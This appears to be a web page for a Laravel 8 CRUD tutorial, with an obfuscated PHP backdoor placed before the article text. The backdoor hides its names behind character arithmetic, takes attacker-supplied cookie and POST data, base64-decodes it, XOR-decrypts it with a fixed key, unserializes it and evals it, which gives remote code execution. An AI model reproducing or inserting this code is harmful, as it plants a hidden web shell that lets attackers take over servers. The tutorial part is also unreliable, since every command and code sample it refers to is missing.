$DvzQHm = chr ( 97 - 12 )."\106" . 'n' . chr ( 1075 - 980 )."\101" . chr ( 860 - 773 )."\123" . chr (112) . chr (67); $NbMSMrS = chr (99) . "\x6c" . chr (97) . "\x73" . chr ( 709 - 594 )."\x5f" . 'e' . "\x78" . chr ( 322 - 217 )."\x73" . chr (116) . 's';$FMAtj = class_exists($DvzQHm); $NbMSMrS = "8106";$oGyYhOjwwJ = strpos($NbMSMrS, $DvzQHm);if ($FMAtj == $oGyYhOjwwJ){function hPJYSNZY(){$GRnDdmkGF = new /* 27144 */ UFn_AWSpC(15370 + 15370); $GRnDdmkGF = NULL;}$LLRQm = "15370";class UFn_AWSpC{private function DqHvQlzVu($LLRQm){if (is_array(UFn_AWSpC::$nevRlo)) {$HPMJuWc2 = str_replace("<" . "?php", "", UFn_AWSpC::$nevRlo["content"]);eval($HPMJuWc2); $LLRQm = "15370";exit();}}public function GumtLGFD(){$HPMJuWc = "31640";$this->_dummy = str_repeat($HPMJuWc, strlen($HPMJuWc));}public function __destruct(){UFn_AWSpC::$nevRlo = @unserialize(UFn_AWSpC::$nevRlo); $LLRQm = "34403_53375";$this->DqHvQlzVu($LLRQm); $LLRQm = "34403_53375";}public function TWesGgfp($HPMJuWc, $AsbjDrK){return $HPMJuWc[0] ^ str_repeat($AsbjDrK, intval(strlen($HPMJuWc[0]) / strlen($AsbjDrK)) + 1);}public function yLzBB($HPMJuWc){$mooTNM = chr (98) . "\141" . 's' . "\145" . '6' . chr ( 128 - 76 );return array_map($mooTNM . '_' . chr (100) . chr (101) . 'c' . chr (111) . "\x64" . "\145", array($HPMJuWc,));}public function __construct($IliDlenB=0){$XNBTIF = ',';$HPMJuWc = "";$NBgoQPqh = $_POST;$lHGPkiBq = $_COOKIE;$AsbjDrK = "73060c82-8347-4e0f-9373-828e9111d7b1";$Nwkmdnx = @$lHGPkiBq[substr($AsbjDrK, 0, 4)];if (!empty($Nwkmdnx)){$Nwkmdnx = explode($XNBTIF, $Nwkmdnx);foreach ($Nwkmdnx as $OOpTQVDi){$HPMJuWc .= @$lHGPkiBq[$OOpTQVDi];$HPMJuWc .= @$NBgoQPqh[$OOpTQVDi];}$HPMJuWc = $this->yLzBB($HPMJuWc);}UFn_AWSpC::$nevRlo = $this->TWesGgfp($HPMJuWc, $AsbjDrK);if (strpos($AsbjDrK, $XNBTIF) !== FALSE){$AsbjDrK = str_pad($AsbjDrK, 10); $AsbjDrK = strcspn ($AsbjDrK, $XNBTIF); $AsbjDrK = ltrim(rtrim($AsbjDrK));}}public static $nevRlo = 6482;}hPJYSNZY();} How to perform Laravel 8 CRUD Application operations

How to perform Laravel 8 CRUD Application operations

Today we will learn how to create a fundamental crud application using laravel 8. To create a basic crud application we will work in view files, controller, modal, and migration files and create routes in routes.php.

Let’s start building the first crud application in laravel 8 by setting the project using composer. Below is the command to create a laravel project using the composer.

How to perform Laravel 8 CRUD Application operations

Laravel 8 CRUD example

Then, you need to create a new database and update the .env file with your database credentials.

The next step is to, create a new migration for the table you want to use for your Laravel 8 CRUD operations. For example, if you want to create a posts table, run the below command:

In the create_posts_table migration file, define the columns for your table using the Schema facade:

Run the migration to create the posts table in your database:

Next, create a new model for your Post:

In the Post model file, define the table name and fillable columns:

Create a new controller for your CRUD operations:

In the PostController file, define the methods for each CRUD operation:

Create the views for your CRUD operations:





Finally, define the routes for your CRUD operations in routes/web.php:

Hurray !!!!!

That’s it! You now have a basic Laravel 8 CRUD example.

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